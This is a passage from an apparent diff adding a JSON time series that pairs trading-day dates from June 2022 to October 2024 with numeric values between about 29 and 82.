"2022-06-13", + 33.13428667838687 + ], + [ + "2022-06-14", + 33.527849064552555 + ], + [ + "2022-06-15", + 38.86810121160628 + ], + [ + "2022-06-16", + 33.99717308594067 + ], + [ + "2022-06-17", + 36.476619627274324 + ], + [ + "2022-06-21", + 41.45113274129851 + ], + [ + "2022-06-22", + 41.24496359551329 + ], + [ + "2022-06-23", + 44.287397470546175 + ], + [ + "2022-06-24", + 50.70590619792766 + ], + [ + "2022-06-27", + 49.35082343575741 + ], + [ + "2022-06-28", + 44.11374503196426 + ], + [ + "2022-06-29", + 44.29951162463085 + ], + [ + "2022-06-30", + 42.252024663060205 + ], + [ + "2022-07-01", + 43.724203408765156 + ], + [ + "2022-07-05", + 47.488153278467166 + ], + [ + "2022-07-06", + 48.890522886000014 + ], + [ + "2022-07-07", + 53.3928406859776 + ], + [ + "2022-07-08", + 53.656090148287355 + ], + [ + "2022-07-11", + 48.61368511897337 + ], + [ + "2022-07-12", + 46.524274554785976 + ], + [ + "2022-07-13", + 46.074923904155504 + ], + [ + "2022-07-14", + 47.027560216875315 + ], + [ + "2022-07-15", + 51.710805120418186 + ], + [ + "2022-07-18", + 49.473316842696036 + ], + [ + "2022-07-19", + 56.737035076756285 + ], + [ + "2022-07-20", + 60.02616582648362 + ], + [ + "2022-07-21", + 62.825236352623094 + ], + [ + "2022-07-22", + 57.456539672138206 + ], + [ + "2022-07-25", + 55.8174301094197 + ], + [ + "2022-07-26", + 50.495777352839795 + ], + [ + "2022-07-27", + 59.30553318848568 + ], + [ + "2022-07-28", + 61.10328517240372 + ], + [ + "2022-07-29", + 64.30175833486666 + ], + [ + "2022-08-01", + 64.11088191250363 + ], + [ + "2022-08-02", + 63.112447310406225 + ], + [ + "2022-08-03", + 67.99963022088815 + ], + [ + "2022-08-04", + 68.78530292114483 + ], + [ + "2022-08-05", + 65.73517288936912 + ], + [ + "2022-08-08", + 64.52577870654153 + ], + [ + "2022-08-09", + 60.35238449404119 + ], + [ + "2022-08-10", + 66.10777881272469 + ], + [ + "2022-08-11", + 64.0158505784396 + ], + [ + "2022-08-12", + 67.76305609271938 + ], + [ + "2022-08-15", + 69.2234564355751 + ], + [ + "2022-08-16", + 68.25063347660452 + ], + [ + "2022-08-17", + 63.57588566771451 + ], + [ + "2022-08-18", + 64.12742502941435 + ], + [ + "2022-08-19", + 56.623359741900444 + ], + [ + "2022-08-22", + 48.52680808309166 + ], + [ + "2022-08-23", + 48.29934194468109 + ], + [ + "2022-08-24", + 49.196961600056014 + ], + [ + "2022-08-25", + 54.41468122917468 + ], + [ + "2022-08-26", + 43.15470912005087 + ], + [ + "2022-08-29", + 41.04549885752601 + ], + [ + "2022-08-30", + 38.76275322190771 + ], + [ + "2022-08-31", + 37.60025507262249 + ], + [ + "2022-09-01", + 37.749727123444174 + ], + [ + "2022-09-02", + 34.82854531447347 + ], + [ + "2022-09-06", + 33.43226963833557 + ], + [ + "2022-09-07", + 40.59445735369458 + ], + [ + "2022-09-08", + 42.3435813218491 + ], + [ + "2022-09-09", + 49.17465057130685 + ], + [ + "2022-09-12", + 52.538917381156956 + ], + [ + "2022-09-13", + 39.420165969456775 + ], + [ + "2022-09-14", + 41.568609341615264 + ], + [ + "2022-09-15", + 38.46055356368759 + ], + [ + "2022-09-16", + 37.373971259753596 + ], + [ + "2022-09-19", + 39.696253449577455 + ], + [ + "2022-09-20", + 38.12571100213282 + ], + [ + "2022-09-21", + 34.81953020140105 + ], + [ + "2022-09-22", + 32.75464590991625 + ], + [ + "2022-09-23", + 30.231945714893286 + ], + [ + "2022-09-26", + 29.617805784900852 + ], + [ + "2022-09-27", + 29.766076451255927 + ], + [ + "2022-09-28", + 36.874149077267845 + ], + [ + "2022-09-29", + 31.758173789428284 + ], + [ + "2022-09-30", + 29.2607197179464 + ], + [ + "2022-10-03", + 36.567141594093584 + ], + [ + "2022-10-04", + 44.964045298183564 + ], + [ + "2022-10-05", + 44.85251232704147 + ], + [ + "2022-10-06", + 43.14685433206494 + ], + [ + "2022-10-07", + 36.05631676725736 + ], + [ + "2022-10-10", + 34.514925552896855 + ], + [ + "2022-10-11", + 32.48042087996029 + ], + [ + "2022-10-12", + 32.42976826591382 + ], + [ + "2022-10-13", + 39.39250351470662 + ], + [ + "2022-10-14", + 34.38712533581099 + ], + [ + "2022-10-17", + 42.73686146726617 + ], + [ + "2022-10-18", + 44.61462312828022 + ], + [ + "2022-10-19", + 43.89413044301445 + ], + [ + "2022-10-20", + 42.855295704656285 + ], + [ + "2022-10-21", + 48.820085748227044 + ], + [ + "2022-10-24", + 51.441164126821846 + ], + [ + "2022-10-25", + 56.04918322540266 + ], + [ + "2022-10-26", + 50.43025271826409 + ], + [ + "2022-10-27", + 46.3944132490922 + ], + [ + "2022-10-28", + 53.06893004031098 + ], + [ + "2022-10-31", + 50.421278013662075 + ], + [ + "2022-11-01", + 48.1732341714105 + ], + [ + "2022-11-02", + 41.54918890173634 + ], + [ + "2022-11-03", + 38.41815462898708 + ], + [ + "2022-11-04", + 42.204749929437114 + ], + [ + "2022-11-07", + 44.74597496888992 + ], + [ + "2022-11-08", + 46.445178619131596 + ], + [ + "2022-11-09", + 42.00739637127299 + ], + [ + "2022-11-10", + 56.11382687620394 + ], + [ + "2022-11-11", + 58.99416554546127 + ], + [ + "2022-11-14", + 57.04401527237937 + ], + [ + "2022-11-15", + 59.31428405795851 + ], + [ + "2022-11-16", + 56.12012240401927 + ], + [ + "2022-11-17", + 55.60571265162285 + ], + [ + "2022-11-18", + 55.612738144394875 + ], + [ + "2022-11-21", + 52.99342899837759 + ], + [ + "2022-11-22", + 56.08021375353418 + ], + [ + "2022-11-23", + 58.171306048504896 + ], + [ + "2022-11-25", + 56.26160897142384 + ], + [ + "2022-11-28", + 52.17424979966955 + ], + [ + "2022-11-29", + 50.17878022700595 + ], + [ + "2022-11-30", + 60.02069938082676 + ], + [ + "2022-12-01", + 60.25866496237003 + ], + [ + "2022-12-02", + 59.02884063052989 + ], + [ + "2022-12-05", + 54.04430367050264 + ], + [ + "2022-12-06", + 48.67150698703775 + ], + [ + "2022-12-07", + 47.686468196842526 + ], + [ + "2022-12-08", + 50.78342377729864 + ], + [ + "2022-12-09", + 49.07756195333755 + ], + [ + "2022-12-12", + 52.44221469257125 + ], + [ + "2022-12-13", + 55.20639958805146 + ], + [ + "2022-12-14", + 52.89835533352792 + ], + [ + "2022-12-15", + 43.99412543254067 + ], + [ + "2022-12-16", + 41.9091497049432 + ], + [ + "2022-12-19", + 39.003183829841504 + ], + [ + "2022-12-20", + 38.8448004323283 + ], + [ + "2022-12-21", + 43.45055900027903 + ], + [ + "2022-12-22", + 38.15560122025084 + ], + [ + "2022-12-23", + 38.87503020890281 + ], + [ + "2022-12-27", + 36.03121729923359 + ], + [ + "2022-12-28", + 33.59470703390252 + ], + [ + "2022-12-29", + 41.37301351337187 + ], + [ + "2022-12-30", + 41.24171139611898 + ], + [ + "2023-01-03", + 39.71484979226108 + ], + [ + "2023-01-04", + 41.35167929513462 + ], + [ + "2023-01-05", + 37.71105079243223 + ], + [ + "2023-01-06", + 46.51260972897674 + ], + [ + "2023-01-09", + 48.40475923002023 + ], + [ + "2023-01-10", + 50.868146430362756 + ], + [ + "2023-01-11", + 55.576184760329625 + ], + [ + "2023-01-12", + 56.98680719476751 + ], + [ + "2023-01-13", + 58.7906002813365 + ], + [ + "2023-01-17", + 59.335770128651085 + ], + [ + "2023-01-18", + 54.36239658789058 + ], + [ + "2023-01-19", + 50.93323307180477 + ], + [ + "2023-01-20", + 58.67629164403532 + ], + [ + "2023-01-23", + 63.80625148261051 + ], + [ + "2023-01-24", + 63.014823093121244 + ], + [ + "2023-01-25", + 62.11472111873341 + ], + [ + "2023-01-26", + 66.615981562647 + ], + [ + "2023-01-27", + 68.70054384183328 + ], + [ + "2023-01-30", + 60.37256323319385 + ], + [ + "2023-01-31", + 63.80404701559251 + ], + [ + "2023-02-01", + 68.11096541872196 + ], + [ + "2023-02-02", + 73.85441380391723 + ], + [ + "2023-02-03", + 67.17124033973386 + ], + [ + "2023-02-06", + 64.24424041980325 + ], + [ + "2023-02-07", + 67.9022411491198 + ], + [ + "2023-02-08", + 61.925622724549505 + ], + [ + "2023-02-09", + 59.186721415158665 + ], + [ + "2023-02-10", + 57.181952475321616 + ], + [ + "2023-02-13", + 60.66072362686076 + ], + [ + "2023-02-14", + 62.21062432915115 + ], + [ + "2023-02-15", + 63.81417140362919 + ], + [ + "2023-02-16", + 57.34634981238751 + ], + [ + "2023-02-17", + 55.126181274905235 + ], + [ + "2023-02-21", + 48.40269310538894 + ], + [ + "2023-02-22", + 48.61095243616974 + ], + [ + "2023-02-23", + 51.09436127003954 + ], + [ + "2023-02-24", + 46.42221209699356 + ], + [ + "2023-02-27", + 48.55269632872043 + ], + [ + "2023-02-28", + 48.17760959965312 + ], + [ + "2023-03-01", + 45.810482329098036 + ], + [ + "2023-03-02", + 48.58840227354634 + ], + [ + "2023-03-03", + 54.864546154169666 + ], + [ + "2023-03-06", + 55.19454790134631 + ], + [ + "2023-03-07", + 50.86087867222728 + ], + [ + "2023-03-08", + 52.47700375936103 + ], + [ + "2023-03-09", + 46.70910336040248 + ], + [ + "2023-03-10", + 42.68475792130685 + ], + [ + "2023-03-13", + 45.32618715608355 + ], + [ + "2023-03-14", + 52.66005119327697 + ], + [ + "2023-03-15", + 54.20488322250659 + ], + [ + "2023-03-16", + 61.10909582314779 + ], + [ + "2023-03-17", + 59.33632302433406 + ], + [ + "2023-03-20", + 60.264097692315545 + ], + [ + "2023-03-21", + 63.85130999004119 + ], + [ + "2023-03-22", + 58.37119060545716 + ], + [ + "2023-03-23", + 61.43714523477012 + ], + [ + "2023-03-24", + 62.37439501073978 + ], + [ + "2023-03-27", + 59.46634086598813 + ], + [ + "2023-03-28", + 57.25299944773222 + ], + [ + "2023-03-29", + 62.39926231256371 + ], + [ + "2023-03-30", + 64.81078403075348 + ], + [ + "2023-03-31", + 68.65106230079155 + ], + [ + "2023-04-03", + 67.47288284837526 + ], + [ + "2023-04-04", + 65.78936267017085 + ], + [ + "2023-04-05", + 61.008015337192774 + ], + [ + "2023-04-06", + 62.96784120628809 + ], + [ + "2023-04-10", + 62.6812324848631 + ], + [ + "2023-04-11", + 59.38094453076952 + ], + [ + "2023-04-12", + 55.107587863090025 + ], + [ + "2023-04-13", + 61.63961640748575 + ], + [ + "2023-04-14", + 60.7085530424107 + ], + [ + "2023-04-17", + 60.99405875002431 + ], + [ + "2023-04-18", + 61.016660738167275 + ], + [ + "2023-04-19", + 60.73242254604232 + ], + [ + "2023-04-20", + 56.168127762055796 + ], + [ + "2023-04-21", + 56.64470959795138 + ], + [ + "2023-04-24", + 55.348521096402436 + ], + [ + "2023-04-25", + 45.27443121131045 + ], + [ + "2023-04-26", + 48.46106022108204 + ], + [ + "2023-04-27", + 59.82491317127799 + ], + [ + "2023-04-28", + 62.16606654266341 + ], + [ + "2023-05-01", + 61.51976748465305 + ], + [ + "2023-05-02", + 56.697980968834926 + ], + [ + "2023-05-03", + 53.34877343396656 + ], + [ + "2023-05-04", + 51.590136975165535 + ], + [ + "2023-05-05", + 60.091217208390184 + ], + [ + "2023-05-08", + 60.96990944022578 + ], + [ + "2023-05-09", + 57.477544706994735 + ], + [ + "2023-05-10", + 61.52927730369809 + ], + [ + "2023-05-11", + 62.68871480112021 + ], + [ + "2023-05-12", + 60.52044159910632 + ], + [ + "2023-05-15", + 62.615223025930455 + ], + [ + "2023-05-16", + 63.058985778906745 + ], + [ + "2023-05-17", + 67.50477913505645 + ], + [ + "2023-05-18", + 72.94947256002929 + ], + [ + "2023-05-19", + 71.3584932688597 + ], + [ + "2023-05-22", + 72.3250204798748 + ], + [ + "2023-05-23", + 63.573706487927645 + ], + [ + "2023-05-24", + 60.42773463764904 + ], + [ + "2023-05-25", + 68.38028230361233 + ], + [ + "2023-05-26", + 74.35079888208426 + ], + [ + "2023-05-30", + 75.26635525990109 + ], + [ + "2023-05-31", + 71.79053270796317 + ], + [ + "2023-06-01", + 74.36582902372527 + ], + [ + "2023-06-02", + 75.92045397568972 + ], + [ + "2023-06-05", + 76.06850180637481 + ], + [ + "2023-06-06", + 75.94776617190612 + ], + [ + "2023-06-07", + 64.83547343574702 + ], + [ + "2023-06-08", + 68.41511119083593 + ], + [ + "2023-06-09", + 69.4590087119348 + ], + [ + "2023-06-12", + 73.62443710355532 + ], + [ + "2023-06-13", + 75.30200485700911 + ], + [ + "2023-06-14", + 76.81542361702537 + ], + [ + "2023-06-15", + 79.0939966593378 + ], + [ + "2023-06-16", + 74.85974078987991 + ], + [ + "2023-06-20", + 73.89678973178684 + ], + [ + "2023-06-21", + 65.29747646409075 + ], + [ + "2023-06-22", + 68.65245617765186 + ], + [ + "2023-06-23", + 63.07001638824235 + ], + [ + "2023-06-26", + 56.45163377306402 + ], + [ + "2023-06-27", + 61.90013785372375 + ], + [ + "2023-06-28", + 62.48372230833165 + ], + [ + "2023-06-29", + 61.441699719994375 + ], + [ + "2023-06-30", + 66.11800242180703 + ], + [ + "2023-07-03", + 66.79065567021627 + ], + [ + "2023-07-05", + 66.77431805932409 + ], + [ + "2023-07-06", + 62.137945143835466 + ], + [ + "2023-07-07", + 60.19091524339127 + ], + [ + "2023-07-10", + 60.32258111631153 + ], + [ + "2023-07-11", + 62.34606617757678 + ], + [ + "2023-07-12", + 67.00179678697992 + ], + [ + "2023-07-13", + 72.0654147941259 + ], + [ + "2023-07-14", + 71.91529212602343 + ], + [ + "2023-07-17", + 74.45261128013567 + ], + [ + "2023-07-18", + 76.47631884468137 + ], + [ + "2023-07-19", + 76.28923474359328 + ], + [ + "2023-07-20", + 60.533023924021236 + ], + [ + "2023-07-21", + 58.86864745492499 + ], + [ + "2023-07-24", + 59.50530211768691 + ], + [ + "2023-07-25", + 62.18428685067264 + ], + [ + "2023-07-26", + 60.06961384542344 + ], + [ + "2023-07-27", + 58.53832415675642 + ], + [ + "2023-07-28", + 65.7129449070575 + ], + [ + "2023-07-31", + 65.89821480048452 + ], + [ + "2023-08-01", + 64.23487431607347 + ], + [ + "2023-08-02", + 51.1192382124909 + ], + [ + "2023-08-03", + 50.32878325783928 + ], + [ + "2023-08-04", + 47.99744420451996 + ], + [ + "2023-08-07", + 52.282111922860715 + ], + [ + "2023-08-08", + 47.97143265274773 + ], + [ + "2023-08-09", + 43.0684358057476 + ], + [ + "2023-08-10", + 44.09156666881597 + ], + [ + "2023-08-11", + 41.327452636256915 + ], + [ + "2023-08-14", + 47.52357985334426 + ], + [ + "2023-08-15", + 42.86234268169418 + ], + [ + "2023-08-16", + 38.81458505890317 + ], + [ + "2023-08-17", + 35.164649386782685 + ], + [ + "2023-08-18", + 34.764593573132885 + ], + [ + "2023-08-21", + 43.62160359040325 + ], + [ + "2023-08-22", + 43.05425368345564 + ], + [ + "2023-08-23", + 50.66793685780985 + ], + [ + "2023-08-24", + 42.284565951888204 + ], + [ + "2023-08-25", + 45.71707515871815 + ], + [ + "2023-08-28", + 48.91866842167368 + ], + [ + "2023-08-29", + 56.91819719066058 + ], + [ + "2023-08-30", + 58.73413404924162 + ], + [ + "2023-08-31", + 59.72265103756472 + ], + [ + "2023-09-01", + 59.18215061309948 + ], + [ + "2023-09-05", + 59.65403351169695 + ], + [ + "2023-09-06", + 54.91184634771947 + ], + [ + "2023-09-07", + 51.37237484286529 + ], + [ + "2023-09-08", + 52.0186465043387 + ], + [ + "2023-09-11", + 57.191076648427135 + ], + [ + "2023-09-12", + 51.4985023728546 + ], + [ + "2023-09-13", + 53.20251797336866 + ], + [ + "2023-09-14", + 56.730751051697695 + ], + [ + "2023-09-15", + 48.429624673768345 + ], + [ + "2023-09-18", + 48.911430043643456 + ], + [ + "2023-09-19", + 47.924773125553685 + ], + [ + "2023-09-20", + 41.79805985315459 + ], + [ + "2023-09-21", + 35.64743730133422 + ], + [ + "2023-09-22", + 35.7237082393811 + ], + [ + "2023-09-25", + 38.39599959594125 + ], + [ + "2023-09-26", + 33.61512496060226 + ], + [ + "2023-09-27", + 34.955706400247564 + ], + [ + "2023-09-28", + 39.65214542587488 + ], + [ + "2023-09-29", + 40.06016399513838 + ], + [ + "2023-10-02", + 44.691209354807114 + ], + [ + "2023-10-03", + 37.988903847319925 + ], + [ + "2023-10-04", + 44.78279994687361 + ], + [ + "2023-10-05", + 43.652402032167075 + ], + [ + "2023-10-06", + 51.17692849309617 + ], + [ + "2023-10-09", + 53.257265127234376 + ], + [ + "2023-10-10", + 55.48656300008652 + ], + [ + "2023-10-11", + 58.263740644470055 + ], + [ + "2023-10-12", + 56.404932926843834 + ], + [ + "2023-10-13", + 50.18884780764298 + ], + [ + "2023-10-16", + 54.93867923358523 + ], + [ + "2023-10-17", + 53.33411509257344 + ], + [ + "2023-10-18", + 47.384463651948685 + ], + [ + "2023-10-19", + 43.68979508045243 + ], + [ + "2023-10-20", + 38.57397976954081 + ], + [ + "2023-10-23", + 40.07956680220043 + ], + [ + "2023-10-24", + 44.79191334319925 + ], + [ + "2023-10-25", + 36.86101056967564 + ], + [ + "2023-10-26", + 32.19561366343369 + ], + [ + "2023-10-27", + 34.40405788473785 + ], + [ + "2023-10-30", + 39.41429017798737 + ], + [ + "2023-10-31", + 41.480775992039746 + ], + [ + "2023-11-01", + 48.393476948802714 + ], + [ + "2023-11-02", + 54.54609958722738 + ], + [ + "2023-11-03", + 58.091735137148994 + ], + [ + "2023-11-06", + 59.29304255486821 + ], + [ + "2023-11-07", + 62.02080063905499 + ], + [ + "2023-11-08", + 62.20836787893557 + ], + [ + "2023-11-09", + 58.488804112306624 + ], + [ + "2023-11-10", + 65.01863746898167 + ], + [ + "2023-11-13", + 63.49310354001445 + ], + [ + "2023-11-14", + 68.90038106762219 + ], + [ + "2023-11-15", + 69.0765756355075 + ], + [ + "2023-11-16", + 69.2897976259018 + ], + [ + "2023-11-17", + 69.35181245325343 + ], + [ + "2023-11-20", + 72.47931360817824 + ], + [ + "2023-11-21", + 68.8263017078313 + ], + [ + "2023-11-22", + 69.96809364608573 + ], + [ + "2023-11-24", + 69.02625351477546 + ], + [ + "2023-11-27", + 68.41313335912322 + ], + [ + "2023-11-28", + 69.29419239198003 + ], + [ + "2023-11-29", + 68.52731709886088 + ], + [ + "2023-11-30", + 66.4837775852468 + ], + [ + "2023-12-01", + 67.66012156418088 + ], + [ + "2023-12-04", + 60.23509711405578 + ], + [ + "2023-12-05", + 61.45567108222501 + ], + [ + "2023-12-06", + 57.097032904129804 + ], + [ + "2023-12-07", + 63.74749005389993 + ], + [ + "2023-12-08", + 65.60445105874985 + ], + [ + "2023-12-11", + 68.90680399698249 + ], + [ + "2023-12-12", + 71.66192168991073 + ], + [ + "2023-12-13", + 75.43482846863225 + ], + [ + "2023-12-14", + 74.69565916495387 + ], + [ + "2023-12-15", + 76.10105474317166 + ], + [ + "2023-12-18", + 77.83669289483944 + ], + [ + "2023-12-19", + 79.16679089519965 + ], + [ + "2023-12-20", + 66.5872801290185 + ], + [ + "2023-12-21", + 70.48346910113553 + ], + [ + "2023-12-22", + 70.95782862368604 + ], + [ + "2023-12-26", + 72.88138070334038 + ], + [ + "2023-12-27", + 73.5134293572555 + ], + [ + "2023-12-28", + 73.07466803633297 + ], + [ + "2023-12-29", + 69.12019354511573 + ], + [ + "2024-01-02", + 56.33738578847997 + ], + [ + "2024-01-03", + 50.192409644911294 + ], + [ + "2024-01-04", + 47.507001294327864 + ], + [ + "2024-01-05", + 48.1914098272199 + ], + [ + "2024-01-08", + 58.38543613298668 + ], + [ + "2024-01-09", + 59.228301634398186 + ], + [ + "2024-01-10", + 62.072189238915044 + ], + [ + "2024-01-11", + 62.932773492361754 + ], + [ + "2024-01-12", + 63.15519454549548 + ], + [ + "2024-01-16", + 63.07759438620296 + ], + [ + "2024-01-17", + 58.597054555521815 + ], + [ + "2024-01-18", + 65.24861560827227 + ], + [ + "2024-01-19", + 72.09059426696524 + ], + [ + "2024-01-22", + 72.48238805538868 + ], + [ + "2024-01-23", + 73.74541490944434 + ], + [ + "2024-01-24", + 75.37955195559745 + ], + [ + "2024-01-25", + 75.73937528715257 + ], + [ + "2024-01-26", + 70.3321048576172 + ], + [ + "2024-01-29", + 73.77708245633248 + ], + [ + "2024-01-30", + 68.17833881766485 + ], + [ + "2024-01-31", + 55.03297656246267 + ], + [ + "2024-02-01", + 59.93639210706989 + ], + [ + "2024-02-02", + 65.77307015422939 + ], + [ + "2024-02-05", + 64.97239472916607 + ], + [ + "2024-02-06", + 63.69029078830028 + ], + [ + "2024-02-07", + 67.25114774950897 + ], + [ + "2024-02-08", + 67.86814318515722 + ], + [ + "2024-02-09", + 71.00125606996677 + ], + [ + "2024-02-12", + 68.12947681299842 + ], + [ + "2024-02-13", + 58.08351979717488 + ], + [ + "2024-02-14", + 62.21072343160672 + ], + [ + "2024-02-15", + 63.28614099240073 + ], + [ + "2024-02-16", + 57.86943146703289 + ], + [ + "2024-02-20", + 53.78041628207842 + ], + [ + "2024-02-21", + 51.71001614313593 + ], + [ + "2024-02-22", + 62.91326853805795 + ], + [ + "2024-02-23", + 61.32695111485371 + ], + [ + "2024-02-26", + 61.03138935045981 + ], + [ + "2024-02-27", + 61.933112428549954 + ], + [ + "2024-02-28", + 58.68783412175314 + ], + [ + "2024-02-29", + 62.110658628006355 + ], + [ + "2024-03-01", + 67.28373929254063 + ], + [ + "2024-03-04", + 64.9853347400497 + ], + [ + "2024-03-05", + 54.867646618319874 + ], + [ + "2024-03-06", + 57.327425289517656 + ], + [ + "2024-03-07", + 62.65515859490535 + ], + [ + "2024-03-08", + 55.45632880194071 + ], + [ + "2024-03-11", + 53.76971358307758 + ], + [ + "2024-03-12", + 58.94239370277966 + ], + [ + "2024-03-13", + 55.31729984855161 + ], + [ + "2024-03-14", + 54.149802519592434 + ], + [ + "2024-03-15", + 48.920970515186504 + ], + [ + "2024-03-18", + 52.81143818200817 + ], + [ + "2024-03-19", + 53.810622059897334 + ], + [ + "2024-03-20", + 58.342336062636974 + ], + [ + "2024-03-21", + 60.04719994117022 + ], + [ + "2024-03-22", + 60.47023949722262 + ], + [ + "2024-03-25", + 58.356250510399086 + ], + [ + "2024-03-26", + 56.466542399775165 + ], + [ + "2024-03-27", + 58.0023355770861 + ], + [ + "2024-03-28", + 56.8298633134878 + ], + [ + "2024-04-01", + 57.88092451443507 + ], + [ + "2024-04-02", + 52.28094131124593 + ], + [ + "2024-04-03", + 53.52930486339859 + ], + [ + "2024-04-04", + 44.893515111848586 + ], + [ + "2024-04-05", + 51.312679219866254 + ], + [ + "2024-04-08", + 51.46701736664198 + ], + [ + "2024-04-09", + 53.45845150841089 + ], + [ + "2024-04-10", + 48.394167147840626 + ], + [ + "2024-04-11", + 56.45124891565979 + ], + [ + "2024-04-12", + 48.226746741994596 + ], + [ + "2024-04-15", + 41.59881527766536 + ], + [ + "2024-04-16", + 41.64671170000592 + ], + [ + "2024-04-17", + 37.31163623025168 + ], + [ + "2024-04-18", + 35.47454026204501 + ], + [ + "2024-04-19", + 29.78170193711 + ], + [ + "2024-04-22", + 35.11928382195188 + ], + [ + "2024-04-23", + 42.2097129525294 + ], + [ + "2024-04-24", + 43.735409109706715 + ], + [ + "2024-04-25", + 42.0260897097341 + ], + [ + "2024-04-26", + 48.868844573526694 + ], + [ + "2024-04-29", + 50.548225191094545 + ], + [ + "2024-04-30", + 43.39152215737572 + ], + [ + "2024-05-01", + 41.03746648986812 + ], + [ + "2024-05-02", + 46.51373769968028 + ], + [ + "2024-05-03", + 53.871844014698794 + ], + [ + "2024-05-06", + 57.382062013850785 + ], + [ + "2024-05-07", + 57.43323491407176 + ], + [ + "2024-05-08", + 57.158639947242364 + ], + [ + "2024-05-09", + 57.95798066774431 + ], + [ + "2024-05-10", + 58.85370450871427 + ], + [ + "2024-05-13", + 59.75919879040759 + ], + [ + "2024-05-14", + 62.25852672336722 + ], + [ + "2024-05-15", + 67.56430780296884 + ], + [ + "2024-05-16", + 66.24064034220761 + ], + [ + "2024-05-17", + 65.90809038282629 + ], + [ + "2024-05-20", + 68.357486821509 + ], + [ + "2024-05-21", + 69.03435876563147 + ], + [ + "2024-05-22", + 68.87395768155056 + ], + [ + "2024-05-23", + 65.15887474968422 + ], + [ + "2024-05-24", + 68.93524886903553 + ], + [ + "2024-05-28", + 70.3317483471631 + ], + [ + "2024-05-29", + 64.4849624856264 + ], + [ + "2024-05-30", + 56.808866025938414 + ], + [ + "2024-05-31", + 55.584897344446865 + ], + [ + "2024-06-03", + 58.367973214278194 + ], + [ + "2024-06-04", + 59.759288010270325 + ], + [ + "2024-06-05", + 68.21118227615025 + ], + [ + "2024-06-06", + 67.94269250940982 + ], + [ + "2024-06-07", + 67.21270246946315 + ], + [ + "2024-06-10", + 68.85620794049697 + ], + [ + "2024-06-11", + 71.48218994129917 + ], + [ + "2024-06-12", + 75.71907177929354 + ], + [ + "2024-06-13", + 77.24541133780953 + ], + [ + "2024-06-14", + 78.63548911382355 + ], + [ + "2024-06-17", + 81.52414995620033 + ], + [ + "2024-06-18", + 81.59261504169912 + ], + [ + "2024-06-20", + 74.20634968761388 + ], + [ + "2024-06-21", + 71.79207726189912 + ], + [ + "2024-06-24", + 62.5110811953194 + ], + [ + "2024-06-25", + 67.06444676252053 + ], + [ + "2024-06-26", + 67.8330044151115 + ], + [ + "2024-06-27", + 68.8145519343944 + ], + [ + "2024-06-28", + 64.53860106893893 + ], + [ + "2024-07-01", + 67.0192752267848 + ], + [ + "2024-07-02", + 70.95886257498674 + ], + [ + "2024-07-03", + 73.67592357396943 + ], + [ + "2024-07-05", + 76.64366860974572 + ], + [ + "2024-07-08", + 77.27940122170969 + ], + [ + "2024-07-09", + 77.51953176363406 + ], + [ + "2024-07-10", + 80.2348707803364 + ], + [ + "2024-07-11", + 62.858076638893436 + ], + [ + "2024-07-12", + 64.99709492339616 + ], + [ + "2024-07-15", + 65.9684284980354 + ], + [ + "2024-07-16", + 66.11312329058289 + ], + [ + "2024-07-17", + 48.933792674447105 + ], + [ + "2024-07-18", + 46.88089092701547 + ], + [ + "2024-07-19", + 43.239373318447676 + ], + [ + "2024-07-22", + 50.18167105423601 + ], + [ + "2024-07-23", + 48.64323194183557 + ], + [ + "2024-07-24", + 36.4418622249992 + ], + [ + "2024-07-25", + 33.74034483289371 + ], + [ + "2024-07-26", + 38.27289243125633 + ], + [ + "2024-07-29", + 39.159803341787665 + ], + [ + "2024-07-30", + 35.40736137762613 + ], + [ + "2024-07-31", + 47.02694250232643 + ], + [ + "2024-08-01", + 40.42713296504961 + ], + [ + "2024-08-02", + 35.322550528069186 + ], + [ + "2024-08-05", + 30.273924968958866 + ], + [ + "2024-08-06", + 33.45839811040406 + ], + [ + "2024-08-07", + 31.67573387585327 + ], + [ + "2024-08-08", + 41.1160639477867 + ], + [ + "2024-08-09", + 42.618309897039815 + ], + [ + "2024-08-12", + 43.26444569739973 + ], + [ + "2024-08-13", + 50.23281684157826 + ], + [ + "2024-08-14", + 50.3208489330871 + ], + [ + "2024-08-15", + 56.74105264151265 + ], + [ + "2024-08-16", + 57.05296820850654 + ], + [ + "2024-08-19", + 60.21314847944269 + ], + [ + "2024-08-20", + 59.4506443189697 + ], + [ + "2024-08-21", + 60.64111471338455 + ], + [ + "2024-08-22", + 54.7313648612733 + ], + [ + "2024-08-23", + 57.718654252093955 + ], + [ + "2024-08-26", + 54.2313010268045 + ], + [ + "2024-08-27", + 55.12113649801618 + ], + [ + "2024-08-28", + 51.04897903638383 + ], + [ + "2024-08-29", + 50.53615668739919 + ], + [ + "2024-08-30", + 54.534999953354514 + ], + [ + "2024-09-03", + 44.53994431463004 + ], + [ + "2024-09-04", + 43.82215285911833 + ], + [ + "2024-09-05", + 44.16938249930859 + ], + [ + "2024-09-06", + 37.08074795367587 + ], + [ + "2024-09-09", + 41.78176751980949 + ], + [ + "2024-09-10", + 45.00292051076568 + ], + [ + "2024-09-11", + 51.81190118359931 + ], + [ + "2024-09-12", + 54.60712492499295 + ], + [ + "2024-09-13", + 55.877407382734496 + ], + [ + "2024-09-16", + 54.25767360665122 + ], + [ + "2024-09-17", + 54.42703818732052 + ], + [ + "2024-09-18", + 52.703832017913655 + ], + [ + "2024-09-19", + 60.529230203846836 + ], + [ + "2024-09-20", + 59.70814246425546 + ], + [ + "2024-09-23", + 60.510056245499776 + ], + [ + "2024-09-24", + 61.99628693111698 + ], + [ + "2024-09-25", + 62.29146156149112 + ], + [ + "2024-09-26", + 64.68726622157254 + ], + [ + "2024-09-27", + 61.548961136431515 + ], + [ + "2024-09-30", + 62.49978162343356 + ], + [ + "2024-10-01", + 54.95999395463287 + ], + [ + "2024-10-02", + 55.53765281156172 + ], + [ + "2024-10-03", + 55.134519517057875 + ], + [ + "2024-10-04", + 60.09918129039655 + ], + [ + "2024-10-07", + 54.213619553117134 + ], + [ + "2024-10-08", + 60.028211442560206 + ], + [ + "2024-10-09", + 62.75216287236524 + ], + [ + "2024-10-10", + 62.089382768316106 + ], + [ + "2024-10-11", + 62.673142842985236 + ], + [ + "2024-10-14", + 65.72887133456248 + ], + [ + "2024-10-15", + 57.575537234237245 + ], + [ + "2024-10-16", + 57.62659551185265 + ], + [ + "2024-10-17", + 57.935621163607244 + ], + [ + "2024-10-18", + 60.84784698930582 + ], + [ + "2024-10-21", + 61.69054326641636 + ], + [ + "2024-10-22", + 62.188726043747074 + ], + [ + "2024-10-23", + 51.94951842570329 + ], + [ + "2024-10-24", + 56.013375179751655 + ], + [ + "2024-10-25", + 58.85257659776926 + ], + [ + "2024-10-28", + 58.9287460158246 + ], + [ + "2024-10-29", + 63.281897844725734 + ], + [ + "2024-10-30", + 58.02256053638995 + ], + [ + 